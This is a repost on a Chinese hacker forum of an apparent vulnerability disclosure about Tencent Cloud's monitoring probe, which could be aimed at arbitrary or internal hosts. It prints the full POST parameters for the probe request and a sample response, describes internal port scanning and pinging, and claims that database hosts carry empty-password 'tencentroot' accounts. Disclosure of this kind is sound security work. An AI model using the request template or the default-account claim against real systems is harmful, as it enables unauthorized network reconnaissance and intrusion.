腾讯云设计缺陷可绕过防火墙探测内网(内网窥探者) - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

腾讯云设计缺陷可绕过防火墙探测内网(内网窥探者)

admin 漏洞预警

简要描述:

腾讯云设计缺陷可绕过防火墙探测内网,可端口扫描,可ping,还可以自定义提交参数到目标服务器,还支持自动化提交,还能知道返回状态

详细说明:

云拨测提供了系统状态监测功能,但未校验提交的服务器是否属于自己

1.png


code 区域
POST:http://cm.qcloud.com/catv2/request.ajax.php

cmd:simpleVerifyTask

data[agentGroupId]:0

data[taskName]:

data[period]:30

data[catTypeName]:http

data[cgis][cgiName]:cginame

data[cgis][stepId]:1

data[cgis][isKeyStep]:1

data[cgis][url]:http://manage.qcloud.com/

data[cgis][parameters][host]:

data[cgis][parameters][port]:80

data[cgis][parameters][checkStr]:

data[cgis][parameters][checkType]:1

data[cgis][parameters][userAgent]:

data[cgis][parameters][cookie]:

data[cgis][parameters][postData]:

data[taskId]:16971

g_tk:1298727730


code 区域
http://cm.qcloud.com/catv2/request.ajax.php

POST

cmd=verify_result&data%5BresultId%5D=23904&g_tk=1298727730


code 区域
{"version":"v1.0","caller":"monitor","callee":"CAT","eventId":101,"timestamp":1421831573,"returnValue":0,"returnCode":0,"returnMsg":"","returnData":{"resultCode":302,"errorDescri":"HTTP\/1.1 302 error","errorReason":"HTTP\u8bf7\u6c42302\u9519\u8bef","suggest":"","resultInfo":""}}



等于是给了你一个内网的浏览器,想访问哪里就访问哪里

404.jpg



漏洞证明:

这里让你扫描端口和检查服务器是否能够ping通,内网窥探者,随便找的一个别人服务器的ip

ping.png


port.png



每台mysqldb安装的时候都会内置一堆空密码的tencentroot账号,我们来看看那些服务器

local_hosts.png



看一看它们的端口呢?

local_host_op.png

标签: 防火墙探测

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表